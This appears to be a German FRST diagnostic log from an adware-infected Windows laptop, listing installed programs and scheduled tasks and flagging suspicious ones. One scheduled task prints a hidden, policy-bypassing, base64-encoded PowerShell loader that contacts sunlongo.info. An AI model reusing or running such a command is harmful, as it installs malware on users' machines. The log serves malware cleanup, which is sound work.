AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: McAfee Anti-Virus und Anti-Spyware (Enabled - Up to date) {16C7C823-5972-5907-58FA-0004E2F9422F}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: McAfee Firewall (Enabled) {959DA8E2-3527-57D1-4915-924367AD4FE9}
==================== Installierte Programme ======================
(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
Acer Backup Manager (HKLM-x32\...\InstallShield_{9DDDF20E-9FD1-4434-A43E-E7889DBC9420}) (Version: 4.0.0.0059 - NTI Corporation)
Acer Device Fast-lane (HKLM\...\{3F62D2FD-13C1-49A2-8B5D-47623D9460D7}) (Version: 1.00.3007 - Acer Incorporated)
Acer Instant Update Service (HKLM\...\{F6100F13-F183-47A2-94A8-9AAC4976E228}) (Version: 1.00.3013 - Acer Incorporated)
Acer Power Management (HKLM\...\{91F52DE4-B789-42B0-9311-A349F10E5479}) (Version: 7.00.3006 - Acer Incorporated)
Acer Recovery Management (HKLM\...\{07F2005A-8CAC-4A4B-83A2-DA98A722CA61}) (Version: 6.00.3011 - Acer Incorporated)
AcerCloud (HKLM-x32\...\{A5AD0B17-F34D-49BE-A157-C8B3D52ACD13}) (Version: 2.01.3115 - Acer Incorporated)
AcerCloud Docs (HKLM-x32\...\{CA4FE8B0-298C-4E5D-A486-F33B126D6A0A}) (Version: 1.00.3201 - Acer Incorporated)
Backup Manager v4 (x32 Version: 4.0.0.0059 - NTI Corporation) Hidden
BoBrowser (HKU\S-1-5-21-2229505580-413648313-3343944023-1002\...\BoBrowser) (Version: 45.0.2454.131 - BoBrowser) <==== ACHTUNG
Body Text Feathering (HKLM-x32\...\PopupProduct) (Version: 1.0.0.0 - Body Text Feathering) <==== ACHTUNG
BrowserAir (HKU\S-1-5-21-2229505580-413648313-3343944023-1002\...\BrowserAir) (Version: 47.0.0.4 - BrowserAir)
BubbleSound (HKLM\...\BubbleSound) (Version: 1.0 - ) <==== ACHTUNG
Chromium (HKU\S-1-5-21-2229505580-413648313-3343944023-1002\...\Chromium) (Version: 46.0.2472.0 - Chromium)
clear.fi Photo (HKLM-x32\...\{B5AD89F2-03D3-4206-8487-018298007DD0}) (Version: 2.01.3107 - Acer Incorporated)
DNS Unlocker version 1.4 (HKLM-x32\...\{E1527582-8509-4011-B922-29E3FB548882}_is1) (Version: 1.4 - www.dnsunlocker.com) <==== ACHTUNG
GamesDesktop 014.005010223 (HKLM-x32\...\gmsd_de_005010223_is1) (Version: - GAMESDESKTOP) <==== ACHTUNG
GamesDesktop 014.005010228 (HKLM-x32\...\gmsd_de_005010228_is1) (Version: - GAMESDESKTOP) <==== ACHTUNG
Games-desktop Maintenance 014.184 (HKLM-x32\...\rec_de_184_is1) (Version: - GAMESDESKTOP) <==== ACHTUNG
GMX MailCheck (HKLM-x32\...\1&1 Mail & Media GmbH Toolbar IE8) (Version: 2.6.6.1 - 1&1 Mail & Media GmbH)
GMX Softwareaktualisierung (HKLM-x32\...\1&1 Mail & Media GmbH 1und1Softwareaktualisierung) (Version: 3.0.3.0 - 1&1 Mail & Media GmbH)
Identity Card (HKLM-x32\...\{3D9CB654-99AD-4301-89C6-0D12A790767C}) (Version: 2.00.3004 - Acer Incorporated)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.2828 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.5.0.1207 - Intel Corporation)
Intel(R) SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
Live Updater (HKLM-x32\...\{EE26E302-876A-48D9-9058-3129E5B99999}) (Version: 2.00.3003 - Acer Incorporated)
Max Driver Updater (HKLM-x32\...\Max Driver Updater_is1) (Version: 2.7.1086.16649 - csmedia.com) <==== ACHTUNG
McAfee Internet Security Suite (HKLM-x32\...\MSC) (Version: 11.6.385 - McAfee, Inc.)
McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.141 - McAfee, Inc.)
Microsoft Office (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.6120.5004 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 38.5.1 - Mozilla)
Mozilla Thunderbird 38.5.1 (x86 de) (HKLM-x32\...\Mozilla Thunderbird 38.5.1 (x86 de)) (Version: 38.5.1 - Mozilla)
MPC Cleaner (HKLM-x32\...\MPC) (Version: - DotC United Inc)
Office Addin (HKLM-x32\...\{6D2BBE1D-E600-4695-BA37-0B0E605542CC}) (Version: 2.01.3200 - Acer)
Professional Cleaning Software (HKLM-x32\...\Professional Cleaning Software) (Version: 3.0.7 - Professional Cleaning Software)
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.0.204 - Ihr Firmenname)
Qualcomm Atheros WiFi Driver Installation (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 11.05 - Qualcomm Atheros)
Satellite Comma (HKLM-x32\...\SoftwareUpdater) (Version: 1.0.0.0 - Satellite Comma) <==== ACHTUNG
Search Protect (HKLM-x32\...\SearchProtect) (Version: 3.0.300.22 - Client Connect LTD) <==== ACHTUNG
SearchModule (HKLM-x32\...\{D2E9FE6A-7003-42A0-96F6-5569DFC2A3A8}_is1) (Version: 2.8.9.113 - Goobzo LTD) <==== ACHTUNG
Security Utility (HKU\S-1-5-21-2229505580-413648313-3343944023-1002\...\Security Utility) (Version: - Securityutility)
Setup (HKLM-x32\...\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}) (Version: - ) <==== ACHTUNG
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
shopperz (HKLM-x32\...\{E34AAB79-D422-40F2-8F78-415D84EB3A38}) (Version: 2.0.0.480 - shopperz) <==== ACHTUNG
Sound+ (HKLM\...\SoundPlus) (Version: 1.0 - )
SpaceSoundPro (HKLM\...\SpaceSoundPro) (Version: 1.0 - ) <==== ACHTUNG
SpaceSoundPro Service (HKLM-x32\...\zz.12571.ssp) (Version: 1.0.0 - CSDI) <==== ACHTUNG
SpaceSoundPro Service (HKLM-x32\...\zz.12776.ssp) (Version: 1.0.0 - CSDI) <==== ACHTUNG
SVH (HKLM-x32\...\rec_en_77_is1) (Version: - ) <==== ACHTUNG
Update for PriceFountain (HKU\S-1-5-21-2229505580-413648313-3343944023-1002\...\Price Fountain) (Version: - Update for PriceFountain) <==== ACHTUNG
Visual Studio 2005 Tools for Office Second Edition Runtime (HKLM-x32\...\Microsoft Visual Studio 2005 Tools for Office Runtime) (Version: - Microsoft Corporation)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
Visual Studio Tools for the Office system 3.0 Runtime (HKLM-x32\...\Visual Studio Tools for the Office system 3.0 Runtime) (Version: - Microsoft Corporation)
Visual Studio Tools for the Office system 3.0 Runtime Service Pack 1 (KB949258) (HKLM-x32\...\{8FB53850-246A-3507-8ADE-0060093FFEA6}.KB949258) (Version: 1 - Microsoft Corporation)
yoursearching uninstall (HKLM-x32\...\yoursearching uninstall) (Version: - yoursearching) <==== ACHTUNG
==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
Task: {037A375B-1376-4467-BBB3-2D9A92B163FB} - System32\Tasks\Go_Palikan => C:\Users\Manz\AppData\Local\{8396B~1\UNINST~1.EXE [2016-01-31] ()
Task: {1B2DFC51-4A80-475F-9BD8-32F048149B3C} - System32\Tasks\Builder Touch2 => Rundll32.exe "C:\Users\Manz\AppData\Local\Builder Touch\{497C67E6-3CE1-63DB-488F-F7972042349F}\vehrub.dll",#1 <==== ACHTUNG
Task: {1BBBD9D7-98F4-49E2-8BDF-E4D56C2F1675} - System32\Tasks\Builder Touch => Rundll32.exe "C:\Users\Manz\AppData\Local\Builder Touch\{497C67E6-3CE1-63DB-488F-F7972042349F}\BuilderTouch.dll",#1 <==== ACHTUNG
Task: {210D3C04-8867-4644-85F3-F73FED2CB154} - System32\Tasks\RSPro => C:\Users\Manz\AppData\Local\SearchModule\dblaunch.exe [2015-12-01] ()
Task: {56F00EA3-177B-4C69-9AFB-515D10EC8640} - System32\Tasks\Power Management => C:\Program Files\Acer\Acer Power Management\ePowerTray.exe [2012-08-22] (Acer Incorporated)
Task: {673E5F4E-01C6-472F-9968-4F14787684C1} - System32\Tasks\Genius_Interval => C:\Users\Manz\AppData\Roaming\Genius\Genius.exe [2016-01-26] ()
Task: {6BBAEF98-4D8C-41CA-90E6-9EEB8289085E} - System32\Tasks\updateTask => c:\task.vbs [2016-02-06] ()
Task: {6F1C5D19-C4A1-480B-8616-5406D197B2C4} - System32\Tasks\bvxvbxxvaa => C:\Users\Manz\AppData\Local\bvxvbxxvaa\bvxvbxxvaa.exe [2016-01-14] () <==== ACHTUNG
Task: {75FE0009-11AD-45E4-87F0-7FA1441696FF} - System32\Tasks\ManzObscenelyAdV2 => Rundll32.exe ShammedFourposter.dll,main 7 1 <==== ACHTUNG
Task: {7E357E48-E878-42AC-930E-3D02D011BE22} - System32\Tasks\iuEmailOutlookAgent => C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuEmailOutlookAgent.exe [2012-08-22] ()
Task: {8DA43EC2-117C-4EFF-A8EE-A7DC6FEF0790} - System32\Tasks\Recovery Management\Notification => C:\Program Files\Acer\Acer Recovery Management\Notification\Notification.exe [2012-07-31] (Acer Incorporated)
Task: {9225353A-5081-47B6-B9AA-51645027D806} - System32\Tasks\Price Fountain => C:\Users\Manz\AppData\Roaming\PriceFountain\UpdateProc\UpdateTask.exe [2016-01-31] () <==== ACHTUNG
Task: {9964E44A-C321-4B38-8F3E-E1122710B790} - System32\Tasks\Run_Bobby_Browser => C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe [2016-01-12] (The BoBrowser Authors) <==== ACHTUNG
Task: {9B972E21-327E-4B96-891F-AABF3DAE5C2C} - System32\Tasks\iuBrowserIEAgent => C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuBrowserIEAgent.exe [2012-08-22] ()
Task: {9C0C2BDE-546F-4871-923F-C9EE3A6A4A9D} - System32\Tasks\ProfessionalCleaningSoftware_Start => C:\Program Files (x86)\Professional Cleaning Software\ProfessionalCleaningSoftware.exe [2015-11-26] (Professional Cleaning Software)
Task: {9F1578F2-3470-4928-BC4F-310518E1E9D8} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {A4602711-658D-4F65-8811-B9EE6E81AFA3} - System32\Tasks\IBUpd2 => C:\Users\Manz\AppData\Local\BrowserAir\47.0.0.4\updater.exe [2016-01-31] ()
Task: {AF4BE34F-0EFF-4488-881A-1BBB7F357543} - System32\Tasks\ALU => C:\Program Files (x86)\Acer\Live Updater\updater.exe [2012-08-24] ()
Task: {AF603348-4FAB-4919-B73D-66B59E54CBDF} - System32\Tasks\Awiikjuw => C:\Program Files\shopperz010220161759\Zelba.bat [2016-02-01] () <==== ACHTUNG
Task: {C298643A-8546-49C7-A66D-7848D452C31D} - System32\Tasks\ProfessionalCleaningSoftware_Popup => C:\Program Files (x86)\Professional Cleaning Software\Splash.exe [2015-11-26] ()
Task: {C793268F-2FA7-41D6-A509-977F26F2F0F1} - System32\Tasks\runTask => C:\Users\Manz\AppData\Local\Temp/Updater.exe
Task: {D07295CC-450D-474A-910A-278242F5318E} - System32\Tasks\crash_service => C:\Users\Manz\AppData\Local\BoBrowser\Application\crash_service.exe [2016-01-12] () <==== ACHTUNG
Task: {D3D787EA-5D20-46A4-BD46-DAC64A685A02} - System32\Tasks\Security Utility Updater => C:\Program Files (x86)\\securityutility\\securityutility\\2.0.0.1\Security Utilityupdt.exe [2016-01-31] () <==== ACHTUNG
Task: {EC17F563-DE77-4458-80CD-797CC6ACFFE4} - System32\Tasks\IBUpd => C:\Users\Manz\AppData\Local\BrowserAir\47.0.0.4\updater.exe [2016-01-31] ()
Task: {F08F28CB-C795-40AE-BFF7-0AEB1389F890} - System32\Tasks\Registration 1und1 Task => C:\Program Files (x86)\1und1Softwareaktualisierung\cdsupdclient.exe [2015-01-12] (1&1 Mail & Media GmbH)
Task: {F1C37C30-BFE2-4268-9AE8-385C097807B8} - System32\Tasks\Genius => C:\Users\Manz\AppData\Roaming\Genius\Genius.exe [2016-01-26] () <==== ACHTUNG
Task: {F8E9F306-F34A-402E-A5B7-FB560F72E779} - System32\Tasks\Microsoft\Windows\AppxDeploymentClient\Pre-staged app cleanup
Task: {FD40ECC5-8C1B-4823-9BDA-73B39E4B7CB1} - System32\Tasks\ALUAgent => C:\Program Files (x86)\Acer\Live Updater\liveupdater_agent.exe [2012-06-22] ()
Task: {FD4BD04B-AE55-4A01-A755-4E28A2548E48} - System32\Tasks\{0D0B7D47-0F7D-040B-7811-090D050F117E} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHMAdQBuAGwAbwBuAGcAbwAuAGkAbgBmAG8ALwB1AC8APwBhAD0AOABsAEIANgBZAGEAcwBaAFgANgB1AHIAdABSAF8AZQBGAEcAeQBTADYASwBXAEwARwBtAGgAVQBxAEcASgA0AGwAZwBvAE0AaQB1AGgATgBFAFgATwBHAHMATQB5AGoAMgA5AFEAdABlAEkAcwBiAGEANQBTADcAQwBEAFkASwAwAGMAQwB5AHIAdgA3AGsAYQBTAG0AWABCAGkAYgBOAEoAZABBAHQALQB4AEcANgB1AFUAbAB4AE4AUQB5AGkAQQBaAFYAMAA1ADYATwBuAEYAaAB6AGUAVgA4AFoARABHAFAAYwBNAFUAVABoAFAAQQA5AFgAcQBkAGEAcgBvAFIAcgBjAHoAbAB3AHoARwBqAGUAUABIAGUAeQByAG4AbgBEAGsAbQB4AGMAQQBMAFQAQQBxAHoAZwBPAEwAZwA1AFcAQwBIADEAMQB1AGgAagBQAGwAawBVADMAUABfAE4AVwB5AHUAcQAyADAAMABzAEcALQBnAHUAeQBiAGwAdABVAEYAYgBtAEYAbQBjAEcAaQBlAGYAYwBBAGIAWgBuAEMATQBOAFoAMwBqAEoAcwBpAFIASQBaAE0AYgBhAGEAcABSAEMAUAB2AEoARgBjADQAcABnAEMAbgBUAEgAZwA3AE0AYgBKAFcAdgBiAFYAZABfAEsAcAB5AGgAdgBsAGwAaABPADcAeAA1AEMAcwA0AG0AQQBiADYAUQBJAFUAZAB4AGgAbwBoAHoAYQBNADUASAA4AGQAeABlAHoAVwB0ADUAbABkAE0AXwBqAE4AcABPAE4ANABSAFUAMwBiAFAAMgA1AEoAOQA3AHYAcABIAG8AaABuAFkAVwAxADAAZAB1AHMATwBFAEUAMgBpAEYAbgBaAEMAUgBXAFkANwBIAHgAMQB1AGcANwByAE4AUQBVAEMAUQBFAFUAdQA1ADMANABKAEsAcABfADYASgBNADAAMQBvAG0AQQBPADQAbgBiAG0ASQBtADkAMQBZADMAeABLAEkAbwBGAGIAawBMAEkAOABSAEYAdgAxAEkAUwB4AHIAWAB2AFgANABqAFUAMwBGAEsAbQBxADEAMgAwAF8AVABRADUAegBFAFoARwAtAHEARQBDAHgANwB1AGIASgBzAGcANQByADYAQQBMAGEANgBHAGcANgB4AGMAegBVADgAbABYADIAYQBKAFIARgBUADYAegBZAEQARgBoADEAMQBIADcANQBIAEEAYQBhAG0AMABOAFUAOABBAEwAZQBqAFAAXwBTAEQAbQB6AG4ARgBuAGoAQwBmAFkAbABUAEEAcQB3AHYAcQA3AHcARABGAF8ALQBUAGsAMABDAEUAaABnAGEALQB3AGsANAA4ADgAZgB0ADgAWQB6AG0ASwA4AFEARwBHAHYAVgA3AGUARgBwAGgAMAByAF8ANgBVAFUAcABEAEwAagBWADUAUgA4AFQAMwA1AGUAOABPAEgAegBFAHcANwBNAGYAXwBXAFkAVwBjAHMAVAA0AFgAaABpAHoAdQBvAEEAeABGAGcAawBiAE8AdQBPADEAOQBPADUAUAB6ADcAWgAxADcAcQAyADEAcwB2AFMAcwBWAG4AagAwAGkAYwBTAGIATQBzAEgAeQBiAHUAOQBnAE8AWAA3AF8ANABsAGEAQgBIAEYAbgBvADEAWAB6AFYAVABvAFAANABEAHcAYgB0AFIAcgBlAFUARwB4ADcAYgBNADAAYwBzAEIAZwBXAFYAVwBMAGYAagBPAFoATABGAFIAUQBZAGIASABpAHoAbABVADkAWQBMAEYAUQBoAEkAXwBuAE0AQQBzAG8AbABxAEcAeQB4AEEANgA2AGYAbwBsAFUATwBXAHQAQwBZAHgAbgBQAFMAWQBJAEEAbwBOAGcATAByAHgAdgB1AGMAMgBlADYAUwBBAGoAVgAtAEQAVgBhAG0ANwBuADEANgBmAHoAVQBDAEUAaABQAE8ANgBQAHcATwBqAGsAdQA5ADgARgBQAFkAVwBYAC0AdgBGAHQATQA0AGMAcQBfAHgAWQBBAEgARQB3AEsAcgBKAFgASgBBAG0ANgBaADgASgB1AF8AbABzAHMAZgBBAFYASQBWAGIAWgB6AGcAbABVAHYAbgBwAEIAWgBKADcAUgBDADgAdwBRAEUAWAA2AC0AeAB5ADIANgBWAGQAaABlADQAeABPAHEAegBpAE8AXwB1AEgARgBvAHEAUwBsAHMAbABEAF8AUwBDAFgAMABfADgARgBPAFkAagBrAFUAUgAxADIANgA1AFMAZABwAFkAWAA3AEgAVABxAHIAZgBzAFkAcwBFADkAUQBhAFIARwBIAEkAMgA2ADAAZAB0AE0ATABpAGwAUgBxAHYAJgBjAD0AdwBmAGwAWABTAF8AbABsAGcAQwBQAGIAbwBhAFkATQBpAHAAUwBJAEUAeQA2ADQAWABxAEcAYgBQAG0AWgBiAG0AaQBSAFYAMgAxAGQAcABuAHoAbgB5AGgAUgBkAFUAaABsAEMAVwB3AHgARwA2AEEAcgBIAGMAZgBOAE4AQQBsAGgAaQBIAFMAdgA5AEEAUwA5AFgANwBXAE8AQQA5AG0AUgBxADIAUABYADkANQBsAFEAawBwAHYAaAB4AEQAUQB0AGsAcQBqAFEAcwB5AGgAVQBhAFoAawBnADEAZQByAFcAWQBVAFYAMABSAGQAZgBEAG8AVgBHAHoAVgBoADkARgBVAEoATQBCADgAOAB2ADcATQBOADAANwBRAEwASQBuAG4AaQBhAEQANgBSAFYAbABQAC0ANQBVAE8AUABJAGkAWABMAFoAWgB5AGUAcABTAGwAZwB2ADkAdQBEADQAUwBjAFcAbQA5AGkAdgBxAHoAVgBXAHYATABFAHkAOQBoAE4AUABMAGEAWABHAHkAUQBoAGwAYQBTAG4AegBVAGMASgBvAEYAbwAyAEcAYwBPAGQAVgBvAG8AdgBDAGQAUAByAEkAZQBhAE0AMQB0AEgARABlAEQAVABUAEYAMABlAG0AOABxAHMANABhAFAAegBaAFIANwBEAGwAOABMAFgAYwBIAEkAMgB1ADYAUABuAHEALQAyAFEAdgBvAHUAdQBSADAAVgBkAE8AZABSAFAASwBYAGkAeABWADQARAAyAE0AdgBzAFMAVABOAC0AbgBiAF8AUQBpAEQARABLAFkAMQBMAEYAXwBNAEkASABDAG4AMABrAEwAcQBXAFEAYQBrAFIAUwBTAEsAMwBIAFgAMgAxAFkAbwBtAC0ANQByAGkAbABFAGMARQByADcAcQBfAFUAeQByAGkAeQBWAEoAWABtAGIAVgB1AG8ARQA3ADAAVgA0AEcATQAxADMAMABuAFkAMAA1AGIAaAAzAEwAUAB6ADQAMAB2AG4ANABpAHoAZwB2ADIAQQBKAHEAbwBkADkAUwA1AHAAVQBHADQAcABWAGMAcABwAHUAcQBfAEEAcABJADcAbQAxAHEAYgBmADgANABiAFMATQBhAGYAYwBIAFQAYwB0ADEAcgBHAGoAZABFAGoANQB0AGMAQwBuAFEAOQBnAGgAUQA5ADYAbgB2ADEATAA2AHoAUgBiAHoAWABFAHkAbgBEAHkAVQBPAEcAeAA2AFUAdgBCAEkAYQB0AFgANwBoAHEALQBIAGkANABMAFMAOAB0AGUANwBlAFMAZgBVADQAdwBrAGEAbwBGAGIARgB6AG4ARQA1ADIARgBYAG0AYgB4AEgAcwB5AFAAdQBDAE4AcgAwAFYAbABOAGkANQBBAF8AZgB0AFEAbQAxAEMAVQA5AG4AbwBaAGUAZAB3AG8ASAA2AGgAagBNAHUATgAwADMASQBUAHcAbwBUAFMAWABLAEYAZwBBAHoATwBOAEwAaQA1AEUARgA5AHkASABHAFcAMwA4AEYAbwBsADYAZAAzAGkATQBtAEYAZABBAHMAdQBxAHMAagBxAEIANgBfAFcAagBhADEAMwB3ADQAZgBtAE0AQwB6AEYAeABKAHAARABEAFMAagBNAE4AYwA3AGoAOABtAHQAUABFAEgAegA3AC0AQwBoAEgATgBKADcATgBWAE4AMwA3AGkAZQBOAGgAYgBMAHUAZwAxAHgARgA1ADQAcQBwAFQAVgBWAHcATABiAGgAUwBhAHcAbQA1AGQAeQB1AE0ASgBiAGMAXwBLAHcAOQBCAGcASwBEAEIAbABaAFEAWABVAEcAeQBuADEANQBDAFoAYgBZAG0AYQBhAGUAYgBVAFgAVABvADYAVwBXAFIANQBuADYAcQBBAE4AbgBTAEIAMQBQAF8AYwBlAGUAWABGAEsAbgAzAC0AQwBaAFYAWgA0AGsANgBvAEkAMgBIAFQAaAB6AEgAOABSADIAYwB0AFkAYgBmADcARwBfAGcAUABmAEYARwBIAEMALQBIAHUAawBnAHYANABrAEMARgBqAE4AVABXAFMAYQA4ADgAQwAyAFQAYQAxAFMAMwB6ADQAaQBuAEEAVwBmAFAAdAAtAHAANABrAEYASQB6ADIANQBhAHkATAB4AEwAeABOAHoAbQBZAHEAQQB1ADEAeABkAGoAQQBKADAAWQB4AGYAYQBGAHcAZgBOAFAALQBfADgAcgBNAGEAcwBfAGwAZgBEAFUAdwAzADEAdABBAHYASQBPAEQAUgA4AGEAVwBBAFQASgB2AG0AaABFAGUASQBKADMAMQB2AGIAdwBEADMAOQBPADgAVgBRAC0ARQBkAEsAbQBUAG8AWAB2AEgATwByAHAAMQAtAFYAcAB2AHoASQBvAEIARwBVAEUAZABpAFoARQBwAEIAWQBEAEEAdQA2AEMAMAA5ADUAVwB2AFEAbwA0AEQARwBkADUAYwBtAG8AdwBoAG8ATAB4AHEAWQB3AEUARgBMACYAcgA9ADgAMAA4ADYANAA3ADAAOQA0ADkAMAAyADYAMgAzADAAOQAwADQAIgA7ACQAcwB0AHMAawA9ACIAewAwAEQAMABCADcARAA0ADcALQAwAEYANwBEAC0AMAA0ADAAQgAtADcAOAAxADEALQAwADkAMABEADAANQAwAEYAMQAxADcARQB9ACIAOwAkAHAAcgBpAGQAPQAiAE8AbgBlAFMAeQBzAHQAZQBtAEMAYQByAGUAIgA7ACQAaQBuAGkAZAA9ACIAMgBPAFQAVAAyAFMAWgBPACIAOwB0AHIAeQB7AGkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGwAdAAgADIAKQB7AGIAcgBlAGEAawA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQB9AAoAaQBmACgALQBOAE8AVAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQBbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwB